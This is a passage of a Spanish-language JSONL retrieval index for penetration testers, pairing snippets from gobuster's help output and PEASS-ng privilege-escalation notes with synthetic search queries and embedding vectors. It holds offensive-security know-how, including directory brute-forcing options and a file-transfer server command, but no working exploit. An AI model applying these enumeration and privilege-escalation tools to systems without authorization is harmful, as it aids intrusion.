-0.08123, 0.00358, 0.16631, -0.08256, 0.05028, -0.07231, -0.11268, -0.04469, 0.01145, 0.03231, -0.05326, -0.1002, 0.03484, -0.06721, -0.17036, -0.02552, -0.03219, 0.08455, 0.10919, 0.0161, 0.01611, -0.01247, 0.02858, -0.01922, 0.0535, 0.07749, 0.03533, -0.04191, -0.09042, 0.01839, -0.15762, -0.04543, -0.05634, -0.10249, -0.03183, -0.12676, 0.08087, 0.04644, -0.05695, 0.06404, 0.11264, 0.06113, 0.02006, 0.01632, -0.02508, 0.02433, 0.00952, 0.07844, -0.13055, 0.1428, 0.0478, 0.05032, 0.02246, 0.02917, 0.00861, 0.06183, 0.00725, 0.06679, -0.04425, -0.10463, -0.01633, -0.00685, -0.04279, 0.00394, -0.0041, 0.02998, -0.05608, -0.12099, -0.01561, 0.04718, -0.02374, 0.01719, 0.00721, -0.00117, 0.02049, -0.0083, 0.02902, -0.05954, -0.09199, -0.10019, -0.02657, 0.04356, 0.019, -0.07122, 0.08199, -0.06732, -0.0156, 0.00188, -0.00135, -0.03834, -0.02538, -0.00973, 0.02258, -0.06104, -0.07508, 0.01387, 0.00601, 0.01013, -0.0252, -0.02329, -0.03635, -0.0579, 0.04018, -0.00969, 0.0188, 0.05787, 0.01674, 0.00769, 0.03794, 0.05294, -0.03905, -0.02147, -0.05067, 0.00826, 0.00596, -0.00935, -0.02876, 0.09344, -0.04973, -0.0467, 0.0272, -0.00112, 0.01159, -0.04319, 0.05766, 0.05056, 0.06427, -0.02018, 0.02142, 0.02488, -0.03435, -6e-05, 0.02176, 0.0002, -0.04095, 0.04136, 0.05507, 0.05235, -0.01401, 0.0086, -0.04592, -0.01236, 0.00866, -0.07017, -0.02602, 0.02453, -0.02486, -0.01619, 0.01263, -0.02793, -0.00786, -0.0339, -0.05143, 0.03969, -0.03489, -0.01825, -0.02891, -0.00812, 0.03382, -0.0214, -0.06635, 0.03132, -0.01236, -0.01868, -0.04083, -0.00539, -0.05694, 0.00694, 0.02243, -0.02361, 0.01738, -0.0106, 0.02978, -0.05024, 0.03363, 0.04766, 0.01752, 0.00057, 0.01088, -0.05333, 0.05022, 0.00771, -0.01701, -0.00585, -0.00604, 0.05908, -0.01414, 0.01326, -0.017, 0.03167, -0.0053, -0.03577, -0.03964, -0.00514, -0.02206, -0.02986, -0.01434, -0.02502, 0.03313, -0.01382, -0.01661, -0.00145]} +{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "cual es una alternativa gratuita a los escaneadores de vulnerabilidades tradicionales?", "v": [0.03393, -0.01565, -0.08208, 0.02464, 0.01695, 0.06729, -0.00294, -0.15565, -0.05939, -0.04967, -0.03199, -0.1228, -0.04839, 0.02438, 0.04174, 0.01148, 0.07194, -0.07591, 0.18257, 0.02627, -0.04294, -0.07334, -0.07242, -0.04607, -0.04965, -0.0816, -0.07969, 0.05676, -0.0306, 0.04267, 0.03804, 0.08337, 0.11356, -0.03368, -0.06395, 0.09577, 0.07082, 0.00718, 0.05922, -0.05615, 0.15069, -0.07159, -0.0709, -0.03899, -0.055, -0.07737, -0.15971, 0.07141, -0.0448, 0.07862, -0.1222, 0.00453, -0.11205, 0.00933, 0.04251, -0.03371, 0.138, -0.06233, -0.04062, -0.02025, -0.05313, 0.16195, 0.12756, -0.03906, 0.0375, -0.02966, -0.06074, -0.01292, -0.12744, 0.07415, 0.09371, 0.06657, 0.00365, -0.04574, -0.11407, 0.03424, -0.0259, 0.04235, -0.0285, 0.09488, 0.07224, -0.0168, 0.10809, 0.04031, -0.18485, -0.06442, 0.03893, -0.0953, 0.06623, -0.04771, 0.09812, 0.03054, 0.03402, 0.12122, -0.00981, -0.13766, 0.10707, 0.02468, -0.06811, 0.08001, -0.02375, -0.00894, -0.06286, 0.06289, 0.08315, -0.00922, -0.02839, 0.02464, -0.0152, -0.01618, -0.05842, 0.04949, -0.04689, 0.04539, -0.01955, 0.0364, -0.05628, 0.00466, 0.0627, 0.01175, -0.06689, -0.03231, -0.06357, -0.02814, 0.01423, 0.02952, 0.02976, 0.01834, -0.05499, 0.05047, 0.04098, -0.08072, -0.00312, -0.0379, -0.11486, -0.02868, 0.12548, -0.13295, 0.00301, 0.00178, 0.05919, 0.02185, 0.02229, -0.04175, 0.03724, 0.02158, 0.08821, -0.07253, -0.06427, -0.04309, -0.0744, 0.039, -0.08222, 0.12511, -0.03504, 0.01372, -0.06661, -0.02199, -0.09047, 0.16665, 0.05422, -0.00028, 0.04655, 0.00188, -0.10444, -0.04452, 0.04339, -0.03088, -0.02792, 0.03836, 0.01857, 0.08369, 0.00123, -0.04172, 0.02995, -0.03731, -0.0118, -0.06938, 0.10096, -0.0684, -0.02043, 0.03455, -0.07635, -0.03152, 0.06684, -0.03127, -0.02895, 0.02908, 0.0426, 0.05861, -0.00437, -0.02979, -0.08832, -0.04889, -0.02305, -0.03459, -0.00111, -0.05675, -0.0589, -0.02206, -0.09143, 0.03496, -0.04516, -0.07092, 0.01182, 0.03628, 0.00698, -0.0215, -0.02303, 0.10364, 0.00431, 0.03003, 0.06139, -0.07618, -0.03181, -0.01859, -0.00532, -0.03607, -0.00058, -0.05914, 0.00831, -0.02642, 0.07519, 0.04408, -0.01631, 0.02093, 0.02072, 0.05388, -0.05623, -0.01992, 0.03513, -0.01402, -0.05113, 0.00556, 0.03943, 0.01865, -0.01576, -0.00948, -0.02319, 0.00931, 0.05253, 0.0599, -0.02201, -0.02216, -0.03265, -0.04042, -0.06381, -0.02516, -0.00905, -0.03705, -0.04599, 0.09072, 0.00822, -0.04328, 0.01412, -0.07587]} +{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "indexar": "que herramienta sirve para escanear directorios de sitios web como si fuera un directorio", "v": [0.03073, -0.01822, -0.18327, -0.10767, 0.02412, -0.15888, -0.07305, -0.11989, 0.0577, 0.00227, -0.067, -0.06035, -0.04272, -0.23821, 0.0771, -0.00823, 0.1769, -0.05064, 0.02685, -0.05944, -0.04674, 0.09961, -0.04447, 0.06193, -0.11766, -0.04028, 0.0151, -0.03706, -0.23123, 0.1229, 0.02679, 0.07606, 0.09981, -0.0624, -0.09231, -0.0894, 0.04081, -0.03151, -0.04966, 0.06449, -0.01485, 0.01247, -0.13753, 0.04247, -0.10795, -0.03221, -0.04436, -0.01057, 0.04065, 0.05096, 0.00567, -0.11557, -0.08398, 0.04426, 0.03835, -0.06832, 0.19376, -0.11253, 0.06565, -0.01888, -0.17131, -0.00372, -0.07602, 0.03511, -0.04497, 0.00463, -0.00464, -0.03847, -0.09221, -0.02484, -0.0764, 0.10614, 0.1344, 0.02492, 0.02372, -0.04512, 0.03383, 0.07638, -0.04511, 0.00093, 0.08721, -0.04733, -0.05544, -0.00299, -0.17426, -0.06698, 0.03075, -0.08012, 0.05259, -0.13785, 0.02602, 0.11374, -0.1043, 0.02888, 0.01734, -0.0847, 0.0423, -0.01279, 0.03313, -0.02786, 0.0862, -0.0622, -0.1353, 0.05992, 0.05467, 0.08433, 0.01631, -0.00533, -0.10636, 0.06079, 0.08016, -0.00047, 0.00081, -0.04694, -0.03159, 0.03684, 0.00376, -0.00487, 0.04659, -0.03486, -0.01274, -0.03305, -0.07849, 0.04079, -0.08825, 0.00269, 0.03256, 0.03207, 0.02378, -0.02978, -0.02163, -0.05112, -0.09941, 0.01707, -0.06213, -0.00164, 0.03601, -0.03838, 0.06683, -0.06664, 0.02147, -0.00565, -0.05086, -0.03519, -0.01929, -0.01515, 0.01648, -0.03747, -0.04644, -0.05486, -0.02026, 0.02212, -0.07165, 0.00243, -0.02718, 0.01279, -0.0012, 0.02486, -0.0577, 0.03911, -0.03102, -0.04459, 0.07761, 0.0367, -0.031, -0.02642, -0.02812, 0.04309, 0.07235, 0.03062, 0.02224, 0.08516, -0.00702, -0.12214, -0.0265, -0.04404, -0.03358, -0.03698, 0.05359, -0.01495, 0.00662, -0.00749, -0.06176, 0.00691, -0.05015, -0.01884, 0.05973, -0.07597, -0.02078, 0.04355, 0.03254, 0.03296, 0.02017, -0.05364, 0.03982, 0.01334, -0.0109, -0.01092, 0.06213, -0.04249, -0.05508, 0.01949, -0.00762, -0.05947, 0.00218, 0.05484, -0.00819, -0.05156, -0.02286, 0.00257, 0.00808, 0.01717, 0.03559, -0.03931, -0.01011, -0.06917, 0.08087, 0.01709, -0.06558, 0.00397, -0.00927, -0.05203, 0.02675, 0.00188, 0.00225, 0.0219, 0.03214, -0.0446, -0.00016, 0.00765, -0.00919, -0.05734, -0.0105, -0.0297, 0.05522, -0.04764, 0.00453, 0.01956, -0.0551, -0.00105, -0.04512, 0.06764, -0.04106, -0.00841, -0.00625, -0.09772, -0.05143, -0.04605, -0.01394, -0.01366, -0.05301, -0.01827, 0.03033, -0.02619, -0.00505, -0.01827]} +{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "indexar": "cual programa puedo usar para probar rutas secretas en una pagina web con muchas opciones", "v": [0.06186, -0.00992, -0.24231, -0.09933, 0.01839, -0.12091, 0.01012, -0.12467, -0.11277, -0.14059, -0.11017, -0.09811, 0.07768, -0.07817, -0.04763, -0.0267, 0.10095, -0.00662, 0.12537, -0.03838, 0.04023, -0.11779, -0.12363, -0.03454, -0.10546, -0.05851, 0.18068, -0.009, -0.00753, -0.05612, -0.05089, 0.08332, 0.10266, -0.0965, -0.10503, 0.08761, 0.06668, 0.00505, 0.10775, -0.02215, 0.02927, 0.00151, -0.07545, 0.04162, 0.08619, 0.10557, -0.08354, -0.09653, -0.14413, -0.03066, 0.00109, -0.07474, -0.10676, -0.00626, 0.03226, -0.08413, 0.07215, -0.12909, -0.09017, 0.02797, 0.04242, -0.03484, 0.01571, 0.02309, -0.00112, -0.07945, -0.01847, 0.01195, -0.07423, 0.03049, 0.00507, 0.09554, 0.07309, 0.0057, -0.00661, 0.05603, -0.02867, -0.02224, 0.06977, -0.0208, 0.0077, 0.02525, -0.03583, 0.10131, -0.14485, -0.09714, 0.00269, -0.03574, 0.0106, -0.0944, 0.05799, 0.01385, 0.00384, 0.09581, 0.04983, -0.07602, 0.09866, 0.07191, 0.01347, -0.04377, 0.05044, -0.0175, -0.11063, 0.15749, -0.0705, 0.06672, 0.01956, -0.04749, -0.05589, 0.0323, 0.06019, -0.03443, -0.13543, -0.05388, -0.06736, 0.01836, -0.01552, 0.01529, 0.00097, -0.0868, -0.12989, 0.04516, -0.15577, 0.03905, 0.1014, 0.05028, -0.0101, 0.05829, -0.0533, 0.02757, -0.04116, -0.0222, -0.05742, -0.02275, -0.01092, -0.01936, 0.00964, -0.01087, 0.0084, -0.03923, 0.07256, -0.02767, -0.05979, -0.0554, 0.06321, -0.0291, -0.05331, 0.00763, -0.05947, 0.03595, -0.01905, -0.01676, 0.01236, 0.0716, -0.01024, -0.00193, 0.02336, -0.09632, -0.02912, 0.05034, -0.06377, 0.08729, -0.03395, -0.00703, 0.09676, -0.06258, -0.0907, -0.02059, -0.00577, 0.00368, 0.01923, 0.11981, 0.01175, -0.07642, 0.02379, -0.03514, -0.05458, -0.02978, 0.0581, -0.01693, -0.05408, 0.01524, 0.01199, 0.05263, 0.00459, -0.04201, 0.02947, 0.00564, -0.01642, 0.02234, 0.00662, 0.0269, -0.06641, 0.02861, 0.02248, 0.00695, 0.04733, -0.02013, 0.02011, -0.08686, -0.046, -0.0144, -0.04056, -0.04784, 0.05206, 0.03785, -0.02372, -0.02063, 0.01631, 0.03185, 0.04246, -0.08334, 0.07688, -0.04732, -0.0496, -0.0097, 0.00812, -0.00511, 0.01158, 0.03403, 0.01672, 0.01569, 0.03391, 0.04824, 0.07802, 0.02753, 0.04389, -0.02836, -0.02135, 0.03002, -0.00567, -0.00273, -0.04704, -0.0382, 0.03261, -0.00011, 0.01891, 0.00333, -0.06251, -0.0551, -0.04618, 0.11577, 0.01567, -0.02744, -0.015, -0.04006, -0.10663, 0.00923, -0.0228, -0.03724, -0.02176, 0.01189, 0.03032, -0.03345, 0.02421, -0.01802]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "quΓ© herramienta me ayuda a escanear rΓ‘pidamente la seguridad local de mis archivos?", "v": [-0.01942, 0.05842, -0.08583, -0.20192, -0.07031, -0.12919, -0.18646, -0.05916, -0.04837, 0.00179, -0.17042, -0.05495, 0.0226, -0.02059, 0.10295, -0.01032, 0.0837, 0.00426, 0.0708, 0.04486, -0.0069, 0.00074, -0.0725, 0.00017, -0.09025, -0.0758, 0.00517, 0.08265, -0.22151, 0.00199, -0.04835, 0.07212, 0.00525, 0.0645, -0.14402, 0.0447, 0.09673, -0.02028, -0.03819, 0.03623, -0.08001, -0.04154, -0.03526, -0.03401, 0.03932, -0.02743, -0.02386, 0.05225, 0.05747, 0.06792, -0.13062, -0.19694, -0.03777, -0.04622, -0.01439, -0.0832, 0.0882, -0.13066, 0.02739, -0.08815, -0.23842, -0.01131, -0.05639, -0.0206, 0.01163, 0.0321, 0.03664, -0.07244, -0.1089, 0.03616, -0.03976, 0.07455, 0.11928, 0.02224, -0.1024, -0.13309, 0.00735, 0.05205, 0.02985, 0.01222, 0.10888, 0.07124, -0.01912, 0.0089, -0.05174, -0.07351, 0.02903, -0.01034, -0.01278, -0.02884, 0.02441, -0.01687, 0.00679, 0.01415, 0.00055, 0.00652, 0.08152, -0.0399, -0.08248, -0.02335, 0.03145, -0.18438, -0.05275, 0.04531, 0.10001, -0.02148, -0.08435, 0.10643, -0.09732, -0.02546, 0.06424, 0.09925, 0.03339, 0.07025, -0.13339, 0.05942, 0.02009, -0.03778, 0.02416, -0.03175, 0.04554, 0.00646, -0.01195, -0.02192, 0.01061, -0.00087, 0.01816, 0.06519, -0.02404, -0.02744, 0.01029, -0.10957, -0.07453, -0.01177, -0.01554, -0.00981, 0.01059, -0.16399, -0.02404, -0.04219, 0.07318, -0.08008, -0.01452, -0.03156, 0.01851, 0.05203, 0.03487, -0.02485, -0.01487, -0.03603, 0.0126, -0.04227, -0.01446, -0.03958, -0.05714, 0.03822, -0.00499, -0.02471, -0.06325, -0.00036, -0.02495, -0.0178, 0.06165, -0.00216, -0.07886, -0.12414, 0.09083, 0.05453, 0.00737, -0.00934, 0.04546, 0.03624, 0.04868, -0.05101, 0.00585, -0.02903, -0.01191, -0.05541, -0.01831, -0.08072, -0.01045, -0.00606, 0.00134, 0.0473, 0.08323, -0.089, 0.06405, -0.04145, -0.02338, 0.08777, -0.02197, -0.00319, -0.03318, -0.04866, -0.1028, -0.00803, -0.01016, -0.05384, 0.02414, -0.01534, -0.02248, -0.05017, -0.01522, -0.00597, 0.04296, 0.05666, -0.03932, -0.04603, 0.01279, -0.01008, 0.02031, 0.03493, 0.04962, 0.04071, 0.038, -0.02456, 0.00911, 0.04224, -0.06655, -0.04966, 0.05108, -0.00144, 0.06754, 0.00582, -0.07063, 0.02802, 0.00956, -0.01107, -0.01451, -0.01125, 0.03252, -0.06635, -0.07926, -0.00125, 0.03719, -0.08402, 0.01413, -0.01468, -0.00394, -0.0351, -0.00084, 0.06312, -0.00059, -0.04126, -0.07546, -0.01713, -0.01276, -0.01373, -0.00229, -0.01124, 0.01997, 0.03233, 0.04489, -0.03901, 0.03777, -0.0246]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "con quΓ© programa puedo enumerar automΓ‘ticamente los vectores de ataque en mi ordenador?", "v": [0.09421, 0.12196, -0.10521, -0.14129, 0.02229, 0.0533, 0.08058, -0.03867, -0.08245, -0.1344, -0.02511, -0.07668, -0.08568, -0.07835, 0.14159, 0.03962, 0.11739, -0.16198, 0.1141, 0.04611, 0.09851, -0.06212, 0.00571, -0.01515, 0.01524, 0.13798, -0.04423, 0.1278, -0.0249, -0.06408, 0.0039, -0.01105, 0.12015, -0.12098, -0.01936, -0.05158, 0.00623, 0.04629, 0.07196, 0.09231, 0.07472, 0.06525, -0.11089, -0.00112, 0.15416, -0.03235, 0.06612, -0.04642, 0.02589, -0.135, -0.02467, 0.02143, -0.06506, -0.04557, -0.00403, -0.07736, 0.05941, -0.03598, 0.06628, 0.01899, -0.04046, 0.12057, 0.00378, -0.07174, -0.00203, 0.04193, 0.03488, -0.02205, -0.06034, 0.04818, -0.06417, 0.01128, 0.05375, -0.05251, 0.03227, 0.05775, 0.00217, 0.00666, 0.11144, 0.0295, -0.06399, -0.10567, -0.01309, 0.02658, -0.02965, -0.01676, 0.05952, -0.07241, -0.00283, -0.06887, 0.0022, 0.03084, -0.0153, 0.04794, 0.04168, -0.00274, 0.09902, -0.01219, 0.04121, 0.04141, 0.02963, -0.10197, -0.14977, 0.18569, -0.02492, 0.03861, 0.01005, -0.02694, -0.04851, -0.07935, 0.05371, -0.06733, -0.05692, -0.12036, -0.09139, -0.06536, -0.036, 0.01194, 0.01744, 0.00325, -0.09173, 0.02272, -0.01957, 0.10776, -0.01532, -0.01436, -0.04414, 0.10065, -0.07871, -0.01046, 0.03509, 0.0092, -0.00891, -0.08787, -0.07463, -0.00301, -0.02214, -0.11447, 0.01861, -0.06606, 0.02424, 0.13714, 0.03939, -0.02812, 0.0058, -0.01712, 0.00542, -0.09935, -0.09988, 0.01088, 0.04791, 0.03023, 0.07589, 0.10262, -0.06603, 0.02338, 0.02169, 0.05375, -0.0299, 0.06086, -0.02726, 0.06966, -0.04208, 0.02725, 0.03301, -0.04423, 0.00605, -0.05091, 0.08584, 0.08516, -0.08158, 0.06362, 0.00377, -0.06913, -0.03587, -0.04648, -0.04605, -0.05247, 0.05948, 0.01377, -0.05283, 0.05088, 0.01006, 0.0264, -0.07658, -0.04602, 0.02816, 0.02851, 0.06018, 0.00254, -0.03984, 0.02316, -0.02298, -0.03057, 0.0181, -0.06572, -0.08679, 0.05118, 0.03273, -0.02846, -0.04498, 0.01071, -0.01866, 0.00648, 0.07671, 0.15287, -0.05678, -0.04076, 0.03215, 0.11031, -0.03254, -0.03025, 0.07918, 0.00872, -0.0265, -0.0227, 0.02844, 0.00073, 0.03185, -0.0011, 0.08282, -0.01166, 0.03702, 0.07731, -0.02204, -0.08314, 0.00417, 0.03916, 0.05372, 0.03638, -0.06519, -0.05669, 0.02875, -0.05802, 0.01945, -0.02617, 0.00745, -0.0458, -0.05528, 0.02254, 0.00587, 0.03036, 0.01343, -0.09948, -0.05222, -0.02499, -0.08211, -0.00408, -0.03473, -0.01936, -0.05903, 0.02967, 0.00635, -0.06594, 0.03667, 0.05321]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "cuΓ‘l es una alternativa gratuita para hacer un anΓ‘lisis rΓ‘pido de permisos y vulnerabilidades locales?", "v": [0.12474, 0.14198, -0.10315, -0.09812, -0.01591, -0.01569, -0.01098, -0.08157, -0.17383, -0.08298, 0.05214, -0.1397, 0.0513, 0.04231, 0.08321, -0.06215, 0.01709, -0.02403, 0.05322, 0.00437, -0.04735, -0.13099, -0.15711, 0.01056, -0.05033, -0.07207, 0.00637, -0.0526, -0.114, 0.00493, -0.02878, 0.03201, 0.0527, 0.01321, -0.03195, 0.08543, 0.10549, 0.07541, 0.04959, -0.03529, 0.10878, -0.01806, -0.07337, 0.01126, -0.00069, -0.09854, -0.16047, 0.01771, -0.03112, -0.02555, -0.03433, -0.07422, -0.09883, -0.09323, 0.0257, -0.01274, 0.16626, -0.20723, -0.03249, -0.02104, -0.0618, 0.04237, 0.06977, 0.04168, 0.08481, 0.0026, -0.00919, 0.06176, -0.098, 0.11463, 0.00232, 0.03408, 0.05904, -0.02488, -0.05382, 0.02316, -0.15432, 0.01772, 0.02154, 0.0741, 0.11258, 0.02677, 0.05707, 0.02372, -0.13795, -0.09525, 0.01807, -0.13535, 0.07775, 0.01375, 0.09156, 0.01963, 0.03446, 0.06642, -0.05043, -0.11404, 0.06299, 0.05884, -0.11397, 0.10183, 0.00892, -0.07961, -0.06728, 0.07865, 0.0549, 0.05057, -0.03076, 0.03893, -0.07417, -0.01758, 0.00862, 0.03403, -0.0312, 0.01891, -0.00561, -0.0208, -0.02341, 0.00146, 0.01764, 0.04037, -0.02417, -0.05679, -0.07502, -0.05481, -0.06914, 0.06633, 0.03987, 0.0546, 0.00537, 0.0153, 0.07124, -0.04032, -0.01187, -0.02142, -0.08359, 0.01649, 0.04133, -0.066, -0.11423, -0.01901, -0.00934, 0.01001, 0.0748, 0.07843, 0.02243, 0.04066, -0.00354, -0.04298, -0.05621, 0.0022, -0.02494, -0.00633, -0.11533, 0.06688, -0.03011, 0.00806, -0.05843, -0.06642, -0.05681, 0.13638, 0.11927, 0.01989, -0.00168, 0.07282, -0.01037, -0.04622, 0.05426, 0.00132, 0.0509, 0.07222, -0.03096, 0.0859, 0.01338, -0.08306, 0.07957, -0.04998, 0.08736, -0.09665, -0.00781, -0.08725, 0.00959, -0.01164, -0.05993, 0.01563, -0.01468, -0.01365, 0.04017, 0.00451, 0.08322, 0.07324, -0.00856, -0.01291, -0.01041, 0.00543, 0.03955, -0.03961, 0.04801, -0.06476, -0.08905, -0.00488, -0.07798, -0.05965, -0.06871, -0.03574, 0.05955, 0.02678, -0.03348, 0.05839, -0.0361, 0.04, -0.05077, -0.00873, 0.10749, -0.05791, -0.02755, -0.00398, -0.01238, -0.02741, 0.00077, -0.06061, 0.04216, -0.00722, 0.03925, 0.07536, 0.04251, 0.03171, 0.02907, -0.02754, 0.01199, 0.05153, 0.03168, 0.03413, -0.03697, -0.02568, 0.03547, -0.02053, 0.00889, 0.03574, 0.00241, 0.00332, 0.08738, 0.01869, -0.023, 0.00893, -0.06829, -0.00516, -0.06454, 0.00115, -0.00716, -0.05612, -0.04403, 0.07097, 0.04491, -0.00995, 0.01883, -0.03217]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Kali (servir): cd tu carpeta && python3 -m http.server 80 β†’ Transferencia de ficheros\n```\n```powershell", "indexar": "cual es una alternativa libre a la transferencia de archivos que usa un servidor web?", "v": [-0.01423, 0.00145, -0.09189, -0.11901, -0.10104, -0.08095, -0.01735, -0.15809, -0.02415, -0.02882, -0.16611, -0.22105, 0.02732, 0.02591, 0.04632, -0.01716, 0.1826, -0.03913, 0.18807, -0.02653, -0.03377, 0.05304, 0.03831, -0.08222, -0.11001, -0.02498, 0.01706, 0.02718, -0.0891, 0.01578, 0.02816, -0.02645, 0.08293, 0.02686, 0.05503, 0.03062, 0.07614, 0.19176, 0.01725, -0.00074, 0.06794, -0.02559, -0.08852, 0.08728, -0.0315, -0.08535, 0.01311, -0.0016, 0.07951, 0.01504, -0.05043, -0.05283, -0.15707, 0.05429, -0.00245, 0.06218, 0.09923, -0.20627, 0.00167, 0.03129, -0.15109, 0.07118, -0.03642, -0.02681, 0.03872, 0.02961, -0.11248, -0.03151, -0.13024, 0.04806, 0.09759, 0.03431, 0.04606, -0.06484, -0.07097, 0.08903, -0.03174, -0.01137, -0.02342, 0.0307, 0.09064, -0.03051, -0.01963, 0.11054, -0.06332, -0.07522, 0.03607, -0.05471, 0.09517, 0.08631, 0.08147, 0.0713, -0.08367, 0.08828, 0.01412, -0.11627, 0.03321, 0.00559, 0.02712, -0.01821, 0.07491, 0.1037, -0.06878, 0.03541, 0.0781, 0.10595, 0.06192, -0.00923, -0.00327, -0.03518, 0.07933, 0.00362, 0.01076, 0.04761, -0.0758, 0.00224, -0.00583, 0.02496, -0.00252, 0.0382, -0.06686, -0.00903, -0.00043, -0.01317, 0.00785, -0.01289, 0.02562, 0.04147, -0.0913, 0.03553, 0.0255, -0.03624, -0.12946, -0.02406, -0.06736, 0.00618, 0.10412, -0.02744, 0.00867, -0.04733, 0.02589, -0.00861, -0.04824, 0.01912, 0.09818, -0.02846, 0.0373, -0.11049, -0.08177, -0.07099, -0.0759, -0.01472, -0.03752, 0.02439, -0.05894, 0.01824, -0.07218, -0.10889, -0.12527, 0.05463, 0.01706, 0.05943, 0.02154, 0.04561, -0.05885, -0.00557, -0.01712, 0.04528, -0.02852, -0.01339, 0.01381, 0.06903, -0.02571, -0.05675, 0.04281, 0.00279, -0.0928, -0.08786, 0.04697, -0.03371, 0.02821, 0.01022, -0.07801, 0.00906, -0.04466, -0.05455, 0.01532, 0.03346, -0.03689, 0.0657, 0.00506, 0.00985, -0.09964, -0.00132, 0.02236, -0.03269, -0.05395, -0.04996, -0.02731, -0.06172, -0.04326, -0.08709, 0.01492, -0.02709, -0.03206, 0.00768, -0.04442, 0.00444, -0.01907, 0.0425, -0.00043, -0.00495, 0.14694, -0.04171, -0.01093, -0.00527, 0.01894, -0.06825, -0.02099, -0.02383, 0.03624, -0.0111, -0.03058, -0.00184, -0.00582, 0.05105, 0.00174, 0.00342, -0.00268, -0.01038, -0.04418, 0.05451, -0.01771, 0.01026, 0.04171, 0.00686, -0.03526, -0.03493, -0.04184, -0.04944, 0.02153, 0.07669, -0.05294, -0.01457, -0.0102, -0.00683, -0.0889, -0.03183, -0.03014, -0.02624, -0.01141, 0.00983, 0.00233, 0.007, 0.04999, 0.00056]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Kali (servir): cd tu carpeta && python3 -m http.server 80 β†’ Transferencia de ficheros\n```\n```powershell", "indexar": "que programa puedo usar para servir archivos desde mi carpeta local sin instalar nada?", "v": [0.0518, 0.04463, -0.22366, -0.1562, -0.01347, -0.17348, -0.00566, -0.02236, -0.16675, -0.05529, -0.16889, -0.14602, -0.02153, -0.05411, -0.01843, 0.01561, 0.12194, -0.09998, 0.14721, -0.02025, -0.04548, 0.01599, 0.01164, -0.00362, -0.08889, 0.0819, 0.13281, 0.00015, -0.10264, -0.09341, -0.02592, 0.0617, 0.05196, -0.04853, -0.02865, -0.03046, 0.038, -0.08336, -0.06625, -0.02108, 0.11696, 0.10577, -0.00681, 0.117, 0.0406, -0.0034, 0.10861, -0.11444, -0.07059, 0.00255, -0.05403, -0.07394, 0.02608, -0.04215, 0.00461, -0.10355, -0.0025, -0.20486, 0.01669, 0.05226, -0.07074, 0.05206, -0.08741, 0.0722, 0.04699, -0.01871, 0.04694, 0.01711, -0.14206, 0.07599, -0.05971, 0.0534, 0.09437, -0.03837, -0.05985, 0.07306, -0.02364, -0.12559, 0.03487, -0.04562, 0.04292, -0.02517, 0.04643, -0.00096, -0.06338, -0.07979, 0.06245, -0.02658, 0.01299, -0.04023, 0.01174, -0.01995, -0.03415, 0.046, 0.08656, -0.11765, 0.098, 0.06281, 0.01876, 0.02559, 0.0271, -0.07117, -0.0021, 0.16711, 0.01925, -0.01167, 0.03593, -0.01753, -0.01792, -0.06023, 0.0789, 0.05428, -0.02785, 0.06312, -0.12625, -0.04186, 0.03475, -0.01517, -0.04084, 0.01368, -0.06874, 0.00379, -0.05103, 0.06066, 0.08702, -0.03393, 0.02739, 0.0961, -0.10569, 0.1686, 0.01164, 